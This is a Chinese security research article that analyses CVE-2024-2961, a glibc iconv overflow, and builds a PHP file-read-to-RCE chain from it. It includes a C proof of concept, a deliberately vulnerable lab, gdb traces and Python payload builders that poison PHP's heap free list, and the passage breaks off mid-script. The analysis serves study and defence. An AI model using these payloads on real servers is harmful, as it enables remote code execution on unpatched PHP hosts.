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原创 Paper | CVE-2024-2961 漏洞分析






近期,Linux GLIBC的库函数iconv缓冲区溢出漏洞(CVE-2024-2961)的细节/PoC被公开,目前已知的利用方式是可以让PHP的任意文件读取漏洞升级的远程命令执行漏洞。本文将对公开的漏洞细节和PHP利用思路进行分析研究。

1 ICONV漏洞详情

CVE-2024-2961本质上是GLIBC中iconv库的漏洞,我认为该漏洞的发现巧合性很大。该漏洞的发现者是通过fuzz php发现该漏洞的,如果单纯的fuzz iconv库是无法导致crash,就算是fuzz php,一般情况下就算触发了该漏洞也很难导致crash。


else if ((used & SS2_mask) != 0 && (ann & SS2_ann) != (used << 8))\          {                                   \        const char *escseq;                       \                                          \        assert (used == CNS11643_2_set); /* XXX */            \        escseq = "*H";                            \        *outptr++ = ESC;                          \        *outptr++ = '$';                          \        *outptr++ = *escseq++;                        \        *outptr++ = *escseq++;                        \                                          \        ann = (ann & ~SS2_ann) | (used << 8);                 \          }                                   \        else if ((used & SS3_mask) != 0 && (ann & SS3_ann) != (used << 8))\          {                                   \        const char *escseq;                       \                                          \        assert ((used >> 5) >= 3 && (used >> 5) <= 7);            \        escseq = "+I+J+K+L+M" + ((used >> 5) - 3) * 2;            \        *outptr++ = ESC;                          \        *outptr++ = '$';                          \        *outptr++ = *escseq++;                        \        *outptr++ = *escseq++;                        \                                          \        ann = (ann & ~SS3_ann) | (used << 8);                 \          }


\x1b$*H        0x1b 0x24 0x2A 0x48\x1b$+I        0x1b 0x24 0x2b 0x49\x1b$+J        0x1b 0x24 0x2b 0x4a\x1b$+K        0x1b 0x24 0x2b 0x4b\x1b$+L        0x1b 0x24 0x2b 0x4c\x1b$+M        0x1b 0x24 0x2b 0x4d


/*CVE-2024-2961 POC$ gcc -o poc ./poc.c && ./pocRemaining bytes (should be > 0): -1$*/#include <iconv.h>#include <stdlib.h>#include <stdio.h>#include <string.h>#include <ctype.h>void hexdump(void *ptr, int buflen){    unsigned char *buf = (unsigned char *)ptr;    int i, j;    for (i = 0; i < buflen; i += 16)    {        printf("%06x: ", i);        for (j = 0; j < 16; j++)            if (i + j < buflen)                printf("%02x ", buf[i + j]);            else                printf("   ");        printf(" ");        for (j = 0; j < 16; j++)            if (i + j < buflen)                printf("%c", isprint(buf[i + j]) ? buf[i + j] : '.');        printf("\n");    }}void main(){    iconv_t cd = iconv_open("ISO-2022-CN-EXT", "UTF-8");    char input[0x10] = "AAAAA劄";    char output[0x10] = {0};    char *pinput = input;    char *poutput = output;    // Same size for input and output buffer    size_t sinput = strlen(input);    size_t soutput = sinput;    iconv(cd, &pinput, &sinput, &poutput, &soutput);    printf("Remaining bytes (should be > 0): %zd\n", soutput);    hexdump(output, 0x10);}


$ gcc poc.c -o poc$ ./poc./pocRemaining bytes (should be > 0): -1000000: 41 41 41 41 41 1b 24 2a 48 00 00 00 00 00 00 00  AAAAA.$*H.......


BUG = "劄".encode()print(BUG)# b'\xe5\x8a\x84'


void main(){    iconv_t cd = iconv_open("ISO-2022-CN-EXT", "UTF-8");    char input[0x3] = "劄";    char output[0x3] = {0};    char overflow[0x5] = "AAAA";    char *pinput = input;    char *poutput = output;    // Same size for input and output buffer    size_t sinput = 3;    size_t soutput = 3;    size_t status = iconv(cd, &pinput, &sinput, &poutput, &soutput);    printf("Remaining bytes (should be > 0): %zd\nstatus = %d\n", soutput, status);    hexdump(output, 0x10);    printf("overflow = %s\n", overflow);}# 查看运行结果$ gcc poc.c -o poc$ ./pocRemaining bytes (should be > 0): -1status = -1000000: 1b 24 2a 48 41 41 41 00 00 13 9e 1c e1 6c 44 86  .$*HAAA......lD.overflow = HAAA


2 PHP任意文件读到RCE




<?php$data = file_get_contents($_POST['file']);echo "File contents: $data";?>


这样我们就可以调用iconv_open("ISO-2022-CN-EXT", "UTF-8");,接着控制iconv函数的输入buffer,达到触发iconv漏洞的目的。




$ cat DockerfileFROM ubuntu:22.04RUN sed -i 's@//.*archive.ubuntu.com@//mirrors.ustc.edu.cn@g' /etc/apt/sources.listRUN sed -i 's/security.ubuntu.com/mirrors.ustc.edu.cn/g' /etc/apt/sources.listRUN apt update && apt install -y nginx php-fpm# libc降级到有漏洞的版本RUN apt install -y libc6-dev=2.35-0ubuntu3 libc-dev-bin=2.35-0ubuntu3 libc6=2.35-0ubuntu3COPY index.php /var/www/html/index.phpCOPY nginx.conf /etc/nginx/sites-enabled/defaultCOPY start.sh /start.shRUN chmod +x /start.shCMD ["start.sh"]$ cat index.php<?php$data = file_get_contents($_POST['file']);echo "File contents: $data";?>$ cat nginx.confserver {    listen 80 default_server;    listen [::]:80 default_server;    root /var/www/html;    index index.php;    server_name _;    location / {        try_files $uri $uri/ /index.php?$query_string;    }    location ~ \.php$ {            fastcgi_split_path_info ^(.+\.php)(/.+)$;            fastcgi_pass unix:/var/run/php/php8.1-fpm.sock;            fastcgi_index index.php;            include fastcgi_params;            fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;            fastcgi_param PATH_INFO $fastcgi_path_info;        }}$ cat start.sh#!/bin/bash/etc/init.d/php8.1-fpm startnginx -g 'daemon off;'




首先我们来看看公开的python PoC脚本,该PoC可以分为3个步骤。

  1. 首先,对目标是否能进行漏洞利用进行检测,该检测过程没法检测目标是否存在漏洞,只能检测目标是否存在进行漏洞利用的条件,有以下三个方面:
  • 检测目标的任意文件读是否支持:data:text/plain;base64,

  • 检测目标的任意文件读是否支持:php://filter//resource=data:text/plain;base64,

  • 检测目标的任意文件读是否支持:php://filter/zlib.inflate/resource=data:text/plain;base64,

  1. 通过/proc/self/maps获取目标的内存布局,获取目标libc文件。获取目标内存布局需要获取libc的基地址,PHP堆的基地址。libc的基地址很好获取,但是PHP堆的基地址就得猜测,没办法100%确定,PHP堆有以下条件:
  • 大小在0x200000之上,并且为该大小的倍数,所以还需要0x200000对齐。

  • 该内存段不属于任何二进制文件。

  • 该内存段的权限为:rw-p

  1. 构造Payload,发送Payload到目标进行漏洞利用。




2.3.1 调试环境搭建


# 安装apt-src$ sudo apt install -y apt-src$ sudo apt-src update$ sudo apt-src install php8.1# 使用apt-src获取php源码后,会把源码解压到当前目录$ ls -alFdrwxr-xr-x 26 ubuntu ubuntu     4096 May 29 07:11 php8.1-8.1.2/# 编译源码$ cd php8.1-8.1.2/ && dpkg-buildpackage# 保证libc存在漏洞$ sudo apt install -y libc6=2.35-0ubuntu3 libc6-dev=2.35-0ubuntu3 libc-dev-bin=2.35-0ubuntu3# gdb调试命令$ gdb ./php8.1-8.1.2/fpm-build/sapi/cli/php$ cat .gdbinitdir ./php8.1-8.1.2/r poc.php$ cat poc.php$poc = "php://filter/read=......";$data = file_get_contents($poc);var_dump($data);

2.3.2 利用分析




struct _zend_mm_heap {#if ZEND_MM_CUSTOM    int                use_custom_heap;#endif#if ZEND_MM_STORAGE    zend_mm_storage   *storage;#endif#if ZEND_MM_STAT    size_t             size;                    /* current memory usage */    size_t             peak;                    /* peak memory usage */#endif    zend_mm_free_slot *free_slot[ZEND_MM_BINS]; /* free lists for small sizes */#if ZEND_MM_STAT || ZEND_MM_LIMIT    size_t             real_size;               /* current size of allocated pages */#endif#if ZEND_MM_STAT    size_t             real_peak;               /* peak size of allocated pages */#endif#if ZEND_MM_LIMIT    size_t             limit;                   /* memory limit */    int                overflow;                /* memory overflow flag */#endif    zend_mm_huge_list *huge_list;               /* list of huge allocated blocks */    zend_mm_chunk     *main_chunk;    zend_mm_chunk     *cached_chunks;           /* list of unused chunks */    int                chunks_count;            /* number of allocated chunks */    int                peak_chunks_count;       /* peak number of allocated chunks for current request */    int                cached_chunks_count;     /* number of cached chunks */    double             avg_chunks_count;        /* average number of chunks allocated per request */    int                last_chunks_delete_boundary; /* number of chunks after last deletion */    int                last_chunks_delete_count;    /* number of deletion over the last boundary */#if ZEND_MM_CUSTOM    union {        struct {            void      *(*_malloc)(size_t);            void       (*_free)(void*);            void      *(*_realloc)(void*, size_t);        } std;        struct {            void      *(*_malloc)(size_t ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC);            void       (*_free)(void*  ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC);            void      *(*_realloc)(void*, size_t  ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC);        } debug;    } custom_heap;    HashTable *tracked_allocs;#endif};



  1. 分配x个相同大小并且地址连续的堆,然后释放它们,那么它们会被放入tcache中形成链表。

  2. 我们获取第一个堆,并且通过漏洞溢出1字节,这样将会覆盖下一个堆的tcache链表指针。

  3. 因为溢出的一字节不可控,在此例中,为0x48,所以我们需要该地址的堆可以让我们任意地址写入。并且在之前控制该地址的值指向我们想要控制的任意地址,比如free_hook地址,这样我们之后分配的堆就能获取到free_hook地址的堆,达到控制free_hook的目的,从而RCE。


1. 有三个大小为0x100的连续的堆0x40100, 0x40200, 0x403002. 控制0x40348地址的值为free_hook地址对齐后地址,或者其他想要任意写的任意地址。3. 释放它们形成tcache链表0x40100->0x40200->0x403004. 获取第一个堆:0x40100,这样tcache链表就变成了:0x40200->0x403005. 触发漏洞,让0x40100的堆溢出一字节,这样tcache的链表就变成了:0x40200->0x40348->free_hook6. 再分配一个堆,tcache链表变成了:0x40348->free_hook7. 重复第6步,tcache链表变成了:free_hook8. 重复第6步,这次我们获取到的堆地址指向了free_hook,让我们可以把其覆盖为system地址9. 调用free(buf), buf=/bin/sh,这样就能成功RCE




  1. zlib.inflate的作用是进行zlib解压缩,将会调用PHP的php_zlib_inflate_filter函数,并且在php_zlib_filter_create函数中限制了能分配的最大堆尺寸为0x8000。

  2. dechunk的作用是处理HTTP CHUNKED,将会调用PHP的php_chunked_filter函数,我们可以通过该函数,buffer的size标志位缩减到任意值。没法控制堆的大小,只能控制有效长度的标志位。在file_get_contents函数的流程中,用户输入的buffer都是放在php_stream_bucket结构体中,该结构体的定义如下:

struct _php_stream_bucket {    php_stream_bucket *next, *prev;    php_stream_bucket_brigade *brigade;    char *buf;    size_t buflen;    /* if non-zero, buf should be pefreed when the bucket is destroyed */    uint8_t own_buf;    uint8_t is_persistent;    /* destroy this struct when refcount falls to zero */    int refcount;};


  1. convert.quoted-printable-decode的作用是对=00格式的数据进行解码,变为\x00

  2. convert.iconv.x.x的作用调用iconv函数对数据进行编码转换。在PoC中使用两种:convert.iconv.UTF-8.ISO-2022-CN-EXTconvert.iconv.latin1.latin1





ZEND_API void* ZEND_FASTCALL _emalloc(size_t size ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC){// 如果设置了custom堆,则调用该函数,跟free_hook的作用一样#if ZEND_MM_CUSTOM    if (UNEXPECTED(AG(mm_heap)->use_custom_heap)) {        return _malloc_custom(size ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);    }#endif    return zend_mm_alloc_heap(AG(mm_heap), size ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);}


2.3.3 漏洞调试



 ? 0x5555557dfae5 <_php_stream_fill_read_buffer+309>    call   qword ptr [rax]               <php_zlib_inflate_filter>        rdi: 0x7ffff527d2a0 —? 0x555555a6dd40 (php_stream_rfc2397_ops) ?— 0x0        rsi: 0x7ffff52a3000 —? 0x555555a0f760 (php_zlib_inflate_ops) —? 0x5555556cc740 (php_zlib_inflate_filter) ?— endbr64        rdx: 0x7fffffffa7a0 —? 0x7ffff5262180 ?— 0x0......In file: /home/ubuntu/CVE-2024-2961/php8.1-8.1.2/main/streams/streams.c:575   570                                 flags = stream->eof ? PSFS_FLAG_FLUSH_CLOSE : PSFS_FLAG_FLUSH_INC;   571                         }   572   573                         /* wind the handle... */   574                         for (filter = stream->readfilters.head; filter; filter = filter->next) { ? 575                                 status = filter->fops->filter(stream, filter, brig_inp, brig_outp, NULL, flags);


$ cat .gdbinitdir ./php8.1-8.1.2/b *(_php_stream_fill_read_buffer+309)r poc.php


$ cat .gdbinitdefine php_heap    p *(struct _zend_mm_heap *) 0x7ffff5200040enddefine pbucket    p *(php_stream_bucket *) $arg0enddefine pbucketall    pbucket $arg0    set $bucket = (php_stream_bucket*) $arg0    if $bucket->next != 0        pbucketall $bucket->next    endenddir ./php8.1-8.1.2/b *(_php_stream_fill_read_buffer+309)r poc.php


#!/usr/bin/env python3# -*- coding=utf-8 -*-import zlibimport base64def p64(data: int) -> bytes:    return int.to_bytes(data, 8, "little")# 该函数对数据进行zlib压缩,让php的zlib.inflate进行解压缩def compress(data) -> bytes:    """Returns data suitable for `zlib.inflate`.    """    # Remove 2-byte header and 4-byte checksum    return zlib.compress(data, 9)[2:-4]# 对数据纪念下quoted printable编码,php解码使用的是convert.quoted-printable-decodedef qpe(data: bytes) -> bytes:    """Emulates quoted-printable-encode.    """    return "".join(f"={x:02x}" for x in data).upper().encode()# 最终填充到0x8000长度的数据def compressed_bucket(data: bytes) -> bytes:    """Returns a chunk of size 0x8000 that, when dechunked, returns the data."""    return chunked_chunk(data, 0x8000)# 进行HTTP CHUNKED编码,php使用dechunkdef chunked_chunk(data: bytes, size: int = None) -> bytes:    """Constructs a chunked representation of the given chunk. If size is given, the    chunked representation has size `size`.    For instance, `ABCD` with size 10 becomes: `0004\nABCD\n`.    """    # The caller does not care about the size: let's just add 8, which is more than    # enough    if size is None:        size = len(data) + 8    keep = len(data) + len(b"\n\n")    size = f"{len(data):x}".rjust(size - keep, "0")    return size.encode() + b"\n" + data + b"\n"# 做了点修改,把chunk函数删除了,因为payload的构造不一样,所以使用chunk函数会有不同def ptr_bucket(*ptrs, size=None) -> bytes:    """Creates a 0x8000 chunk that reveals pointers after every step has been ran."""    if size is not None:        assert len(ptrs) * 8 == size    bucket = b"".join(map(p64, ptrs))    bucket = qpe(bucket)    return bucketdef buildPayload() -> str:    payload = b""    pages = (        payload    )    resource = compress(pages)    resource = base64.b64encode(resource)    resource = f"data:text/plain;base64,{resource.decode()}"    filters = [        "zlib.inflate",    ]    filters = "|".join(filters)    path = f"php://filter/read={filters}/resource={resource}"    return pathdef main():    path = buildPayload()    phpCode = f"""<?php$poc = "{path}";$data = file_get_contents($poc);var_dump($data);?>"""    with open("poc.php", "w") as f:        f.write(phpCode)    print(path)if __name__ == "__main__":    main()

以上就是我通过公开的PoC修改的一版调试用的python脚本,我们只需关注该脚本中的buildPayload函数。调试命令也很简单:python3 poc.py && gdb ./php8.1-8.1.2/fpm-build/sapi/cli/php




/* num, size, count, pages */#define ZEND_MM_BINS_INFO(_, x, y) \    _( 0,    8,  512, 1, x, y) \    _( 1,   16,  256, 1, x, y) \    _( 2,   24,  170, 1, x, y) \    _( 3,   32,  128, 1, x, y) \    _( 4,   40,  102, 1, x, y) \    _( 5,   48,   85, 1, x, y) \    _( 6,   56,   73, 1, x, y) \    _( 7,   64,   64, 1, x, y) \    _( 8,   80,   51, 1, x, y) \    _( 9,   96,   42, 1, x, y) \    _(10,  112,   36, 1, x, y) \    _(11,  128,   32, 1, x, y) \    _(12,  160,   25, 1, x, y) \    _(13,  192,   21, 1, x, y) \    _(14,  224,   18, 1, x, y) \    _(15,  256,   16, 1, x, y) \    _(16,  320,   64, 5, x, y) \    _(17,  384,   32, 3, x, y) \    _(18,  448,    9, 1, x, y) \    _(19,  512,    8, 1, x, y) \    _(20,  640,   32, 5, x, y) \    _(21,  768,   16, 3, x, y) \    _(22,  896,    9, 2, x, y) \    _(23, 1024,    8, 2, x, y) \    _(24, 1280,   16, 5, x, y) \    _(25, 1536,    8, 3, x, y) \    _(26, 1792,   16, 7, x, y) \    _(27, 2048,    8, 4, x, y) \    _(28, 2560,    8, 5, x, y) \    _(29, 3072,    4, 3, x, y)


pwndbg> php_heap$1 = {  use_custom_heap = 0,  storage = 0x0,  size = 493544,  peak = 493544,  free_slot = ......pwndbg> p $1.free_slot[15]$2 = (zend_mm_free_slot *) 0x7ffff5288100 获取一个0x100大小的堆


def buildPayload() -> str:    heapSize = 0x100    step1 = b"A" * heapSize    step1 = compressed_bucket(step1)    pages = (        step1    )    resource = compress(pages)    resource = base64.b64encode(resource)    resource = f"data:text/plain;base64,{resource.decode()}"    filters = [        # zlib解压缩        "zlib.inflate",        # 让php分配0x100大小的堆        "dechunk",        "convert.iconv.latin1.latin1"    ]    filters = "|".join(filters)    path = f"php://filter/read={filters}/resource={resource}"    return path



 ? 0x5555557dfae5 <_php_stream_fill_read_buffer+309>    call   qword ptr [rax]               <php_zlib_inflate_filter>        rdi: 0x7ffff527d2a0 —? 0x555555a6dd40 (php_stream_rfc2397_ops) ?— 0x0        rsi: 0x7ffff5283000 —? 0x555555a0f760 (php_zlib_inflate_ops) —? 0x5555556cc740 (php_zlib_inflate_filter) ?— endbr64        rdx: 0x7fffffffa7a0 —? 0x7ffff5262180 ?— 0x0


pwndbg> c ? 0x5555557dfae5 <_php_stream_fill_read_buffer+309>    call   qword ptr [rax]               <php_chunked_filter>        rdi: 0x7ffff527d2a0 —? 0x555555a6dd40 (php_stream_rfc2397_ops) ?— 0x0        rsi: 0x7ffff5283050 —? 0x555555a6db00 (chunked_filter_ops) —? 0x5555557bcdc0 (php_chunked_filter) ?— endbr64        rdx: 0x7fffffffa7b0 —? 0x7ffff5262180 ?— 0x0pwndbg> pbucket 0x7ffff5262180$1 = {  next = 0x0,  prev = 0x0,  brigade = 0x7fffffffa7b0,  buf = 0x7ffff52a3000 '0' <repeats 200 times>...,  buflen = 32768,  own_buf = 1 '\001',  is_persistent = 0 '\000',  refcount = 1}


pwndbg> c ? 0x5555557dfae5 <_php_stream_fill_read_buffer+309>    call   qword ptr [rax]               <php_iconv_stream_filter_do_filter>        rdi: 0x7ffff527d2a0 —? 0x555555a6dd40 (php_stream_rfc2397_ops) ?— 0x0        rsi: 0x7ffff52830a0 —? 0x7ffff493e430 (php_iconv_stream_filter_ops) —? 0x7ffff4937d60 (php_iconv_stream_filter_do_filter) ?— endbr64        rdx: 0x7fffffffa7a0 —? 0x7ffff5262180 ?— 0x0pwndbg> pbucket 0x7ffff5262180$2 = {  next = 0x0,  prev = 0x0,  brigade = 0x7fffffffa7a0,  buf = 0x7ffff52a3000 'A' <repeats 200 times>...,  buflen = 256,  own_buf = 1 '\001',  is_persistent = 0 '\000',  refcount = 1}


pwndbg> ni......pwndbg> p *brig_outp.head$1 = {  next = 0x0,  prev = 0x0,  brigade = 0x7fffffffa7b0,  buf = 0x7ffff5288100 'A' <repeats 200 times>...,  buflen = 256,  own_buf = 1 '\001',  is_persistent = 0 '\000',  refcount = 1}pwndbg> php_heap$2 = {......pwndbg> p $2.free_slot[15]$3 = (zend_mm_free_slot *) 0x7ffff5288200

从上述过程可以看出,我们成功地申请到了一个大小为0x100的堆。 释放一个长度为0x100大小的堆


def buildPayload() -> str:    heapSize = 0x100    step1 = b"A" * 0x10    step1 = chunked_chunk(step1, heapSize)    step1 = compressed_bucket(step1)    pages = (        step1    )    resource = compress(pages)    resource = base64.b64encode(resource)    resource = f"data:text/plain;base64,{resource.decode()}"    filters = [        # zlib解压缩        "zlib.inflate",        # 让php分配0x100大小的堆        "dechunk",        "convert.iconv.latin1.latin1",        # 释放0x100大小的堆        "dechunk",        "convert.iconv.latin1.latin1"    ]    filters = "|".join(filters)    path = f"php://filter/read={filters}/resource={resource}"    return path


pwndbg> p *brig_inp.head$1 = {  next = 0x0,  prev = 0x0,  brigade = 0x7fffffffa7a0,  buf = 0x7ffff5288100 'A' <repeats 16 times>, '0' <repeats 184 times>...,  buflen = 16,  own_buf = 1 '\001',  is_persistent = 0 '\000',  refcount = 1}p $2.free_slot[15]$3 = (zend_mm_free_slot *) 0x7ffff5288200


pwndbg> p *brig_outp.head$1 = {  next = 0x0,  prev = 0x0,  brigade = 0x7fffffffa7b0,  buf = 0x7ffff527e060 'A' <repeats 16 times>, "\200\340'\365\377\177",  buflen = 16,  own_buf = 1 '\001',  is_persistent = 0 '\000',  refcount = 1}pwndbg> p $2.free_slot[15]$3 = (zend_mm_free_slot *) 0x7ffff5288100

从上面的结果可以看出,大小为0x100的堆(0x7ffff5288100)已经被释放并且被放入free_slot当中。 触发漏洞




  1. 最开始0x100大小的堆的free链表为:0x7ffff5288100->0x200->0x300->0x400->0x500...

  2. 申请三个堆后,free链表为:0x7ffff5288400->0x500->0x600...

  3. 把这三个堆释放后,free链表为:0x7ffff5288300->0x200->0x100->0x400...

  4. 再次申请两个堆,地址为 0x7ffff52883000x7ffff5288200

  5. 把这两个堆释放,这个时候free链表为:0x7ffff5288200->0x300->0x100->0x400...

  6. 触发漏洞,这个时候0x7ffff5288200会被用来存放iconv的结果,所以能溢出1字节覆盖到了0x7ffff5288300地址的第一字节,这个时候free链表变为了:0x7ffff5288300->0x148->...

  7. 由于触发漏洞时,iconv返回-1,所以0x7ffff5288200堆在溢出后会被释放,这个时候free链表为:0x7ffff5288200->0x300->0x148...


def buildPayload() -> str:    '''    我们把一次处理dechunk + convert.iconv.的过程算一步    '''    heapSize = 0x100    BUG = "劄".encode("utf-8")    # 第一步申请0x100的堆,第二步释放    step1_malloc_step2_free = b"A" * 0x10    # 第三次dechunk,长度小于0x100    step1_malloc_step2_free = chunked_chunk(step1_malloc_step2_free)    # 第二次dechunk,长度小于0x100    step1_malloc_step2_free = chunked_chunk(step1_malloc_step2_free, heapSize)    # 第一次dechunk,长度等于0x100    step1_malloc_step2_free = compressed_bucket(step1_malloc_step2_free)    # 第二步申请0x100的堆,第三步释放    step2_malloc_step3_free = b"B" * 0x20    # 第三次dechunk,长度小于0x100    step2_malloc_step3_free = chunked_chunk(step2_malloc_step3_free, heapSize)    # 第二次dechunk,长度等于0x100    step2_malloc_step3_free = chunked_chunk(step2_malloc_step3_free)    # 第一次dechunk,长度大于0x100    step2_malloc_step3_free = compressed_bucket(step2_malloc_step3_free)    # 第三步触发bug    step3_trigger_bug = (0x100 - len(BUG)) * b"\x00" + BUG    # 确保长度为0x100    assert len(step3_trigger_bug) == 0x100    # 第三次dechunk,长度等于0x100    step3_trigger_bug = chunked_chunk(step3_trigger_bug)    # 第二次dechunk,长度大于0x100    step3_trigger_bug = chunked_chunk(step3_trigger_bug)    # 第一次dechunk,长度大于0x100    step3_trigger_bug = compressed_bucket(step3_trigger_bug)    pages = (        step1_malloc_step2_free * 3 +        step2_malloc_step3_free * 2 +        step3_trigger_bug    )    resource = compress(pages)    resource = base64.b64encode(resource)    resource = f"data:text/plain;base64,{resource.decode()}"    filters = [        # zlib解压缩        "zlib.inflate",        # 第一步        "dechunk",        "convert.iconv.latin1.latin1",        # 第二步        "dechunk",        "convert.iconv.latin1.latin1",        # 第三步触发漏洞        "dechunk",        "convert.iconv.UTF-8.ISO-2022-CN-EXT"    ]    filters = "|".join(filters)    path = f"php://filter/read={filters}/resource={resource}"    return path


$ python3 poc1.py && gdb ./php8.1-8.1.2/fpm-build/sapi/cli/php# 最终断点停在执行完处理convert.iconv.UTF-8.ISO-2022-CN-EXT的函数   0x5555557dfae5 <_php_stream_fill_read_buffer+309>    call   qword ptr [rax] ? 0x5555557dfae7 <_php_stream_fill_read_buffer+311>    cmp    eax, 2   0x5555557dfaea <_php_stream_fill_read_buffer+314>    je     _php_stream_fill_read_buffer+256                <_php_stream_fill_read_buffer+256>    ↓   0x5555557dfab0 <_php_stream_fill_read_buffer+256>    pxor   xmm0, xmm0   0x5555557dfab4 <_php_stream_fill_read_buffer+260>    movaps xmmword ptr [r12], xmm0   0x5555557dfab9 <_php_stream_fill_read_buffer+265>    mov    rbp, qword ptr [rbp + 0x18]   0x5555557dfabd <_php_stream_fill_read_buffer+269>    test   rbp, rbp   0x5555557dfac0 <_php_stream_fill_read_buffer+272>    je     _php_stream_fill_read_buffer+448                <_php_stream_fill_read_buffer+448>    ↓   0x5555557dfb70 <_php_stream_fill_read_buffer+448>    mov    rbp, qword ptr [r14]   0x5555557dfb73 <_php_stream_fill_read_buffer+451>    test   rbp, rbp   0x5555557dfb76 <_php_stream_fill_read_buffer+454>    jne    _php_stream_fill_read_buffer+502                <_php_stream_fill_read_buffer+502>─────────────────────────────────────────────────────────────────────────────────[ SOURCE (CODE) ]─────────────────────────────────────────────────────────────────────────────────In file: /home/ubuntu/CVE-2024-2961/php8.1-8.1.2/main/streams/streams.c:577   572   573                         /* wind the handle... */   574                         for (filter = stream->readfilters.head; filter; filter = filter->next) {   575                                 status = filter->fops->filter(stream, filter, brig_inp, brig_outp, NULL, flags);   576 ? 577                                 if (status != PSFS_PASS_ON) {   578                                         break;   579                                 }   580   581                                 /* brig_out becomes brig_in.   582                                  * brig_in will always be empty here, as the filter MUST attach any un-consumed buckets# freeslot的定义如下define freeslot    set $phpheap = (struct _zend_mm_heap *) 0x7ffff5200040    p $phpheap->free_slot[15]endpwndbg> freeslot$2 = (zend_mm_free_slot *) 0x7ffff528b200pwndbg> x/32gx 0x7ffff528b2000x7ffff528b200: 0x00007ffff528b300  0x00000000000000000x7ffff528b210: 0x0000000000000000  0x00000000000000000x7ffff528b220: 0x0000000000000000  0x00000000000000000x7ffff528b230: 0x0000000000000000  0x00000000000000000x7ffff528b240: 0x0000000000000000  0x00000000000000000x7ffff528b250: 0x0000000000000000  0x00000000000000000x7ffff528b260: 0x0000000000000000  0x00000000000000000x7ffff528b270: 0x0000000000000000  0x00000000000000000x7ffff528b280: 0x0000000000000000  0x00000000000000000x7ffff528b290: 0x0000000000000000  0x00000000000000000x7ffff528b2a0: 0x0000000000000000  0x00000000000000000x7ffff528b2b0: 0x0000000000000000  0x00000000000000000x7ffff528b2c0: 0x0000000000000000  0x00000000000000000x7ffff528b2d0: 0x0000000000000000  0x00000000000000000x7ffff528b2e0: 0x0000000000000000  0x00000000000000000x7ffff528b2f0: 0x0000000000000000  0x2a241b0000000000pwndbg>0x7ffff528b300: 0x00007ffff528b148  0x42424242424242420x7ffff528b310: 0x4242424242424242  0x4242424242424242

从上面的内存布局可以看出,程序已经按照我们的设想触发漏洞,溢出覆盖了free_slots的指针。 最终利用



  1. 因为0x7ffff528b300指向了0x7ffff528b148,所以我们需要控制该地址,恰好0x7ffff528b100是第一步中申请到的第一个堆,所以我们需要让step1_malloc_step2_free指向_zend_mm_heap段的地址。

  2. _zend_mm_heap的地址为0x7ffff5200040,我们利用的堆的大小为0x100,从0x7ffff5200050开始,0x100的大小,可以覆盖到所有的free_slot。所以,我们让0x7ffff528b148指向0x7ffff5200050

  3. 我们需要申请三个堆,把0x200->0x300->0x148这三个堆分配出来。这个时候free链表头为:0x7ffff5200050

  4. 申请一个堆,这个堆的地址为:0x7ffff5200050,写入我们需要控制的值。首先把size位设置为0x200000,free_slot只设置0x140和0x18的地址,其他皆为0。0x140的堆指向0x7ffff5200040,用来设置use_custom_heap,0x18的堆指向0x7ffff5200040 + 0x168,用来设置custom_heap。这里为什么设置0x140的堆呢?这个值是可以变化的,在这里参考了公开PoC中的定义cmd的命令长度为0x140,如果命令长度不够,则用\0填充到0x140的长度。

  5. 写入use_custom_heapcustom_heap的值。

  6. 写入需要执行的命令字符串,当该堆释放的时候,就会调用system执行指定命令。

这里需要注意,执行的命令建议加上kill -9 $PPID;,否则所有堆里的数据都会被当成命令去执行一遍。


def chunked_add_bad_data(data: bytes, badData: bytes, totalsize: int)->bytes:    '''    php处理dechunk的时候有一个问题,首先判断长度,只处理0-9, A-F, a-f这些字符。    如果判断非这些字符,就会判断为处理长度结束,接着会判断下一个字符是否是\r或者\n,如果不是则跳过。    这让我们可以在长度和\n之间注入其他字符,这些字符有以下要求,开始的值不能为十六进制,中间不能含有\n或者\r。    一个示例:    b'00000010........\x00A\x00\x00\x00\x00\x00\x00AAAAAA\n000008\nAAAAAAAA\n\n'    这样往堆的0x10地址注入了0x4100    不过这种方案限制比较大,如果php的_zend_mm_heap地址包含0x0a或者0x0d,就不能用了    '''    dataSize = len(data)    chunk = f"{dataSize:x}".rjust(8, "0")    chunk = chunk.encode() + b"." * 8 + badData    end = b"\n" + data + b"\n"    chunk += b"A" * (totalsize - len(chunk) - len(end))    chunk += end    assert len(chunk) == totalsize    return chunk    def buildPayload() -> str:    '''    我们把一次处理dechunk + convert.iconv.的过程算一步    '''    heapSize = 0x100    BUG = "劄".encode("utf-8")    # _zend_mm_heap基地址    zend_heap_base = 0x7ffff5200040    # 第一步申请0x100的堆,第二步释放    # 第三次dechunk,长度小于0x100    step1_malloc_step2_free = chunked_add_bad_data(b"A" * 8, p64(zend_heap_base + 0x10) * 10, 0xA0)    # 第二次dechunk,长度小于0x100    step1_malloc_step2_free = chunked_chunk(step1_malloc_step2_free, heapSize)    # 第一次dechunk,长度等于0x100    step1_malloc_step2_free = compressed_bucket(step1_malloc_step2_free)    # 第二步申请0x100的堆,第三步释放    step2_malloc_step3_free = b"B" * 0x20    # 第三次dechunk,长度小于0x100    step2_malloc_step3_free = chunked_chunk(step2_malloc_step3_free, heapSize)    # 第二次dechunk,长度等于0x100    step2_malloc_step3_free = chunked_chunk(step2_malloc_step3_free)    # 第一次dechunk,长度大于0x100    step2_malloc_step3_free = compressed_bucket(step2_malloc_step3_free)    # 第三步触发bug    step3_trigger_bug = (0x100 - len(BUG)) * b"\x00" + BUG    # 确保长度为0x100    assert len(step3_trigger_bug) == 0x100    # 第三次dechunk,长度等于0x100    step3_trigger_bug = chunked_chunk(step3_trigger_bug)    # 第二次dechunk,长度大于0x100    step3_trigger_bug = chunked_chunk(step3_trigger_bug)    # 第一次dechunk,长度大于0x100    step3_trigger_bug = compressed_bucket(step3_trigger_bug)    # 第三次dechunk, 0\n    step3_trailer_chunk = b"0\n".ljust(0x48, b"\x00") + p64(zend_heap_base + 0x10)    step3_trailer_chunk += b"\x00" * (heapSize - len(step3_trailer_chunk))    # 第二次dechunk,长度等于0x100    step3_trailer_chunk = chunked_chunk(step3_trailer_chunk)    # 第一次dechunk,长度大于0x100    step3_trailer_chunk = 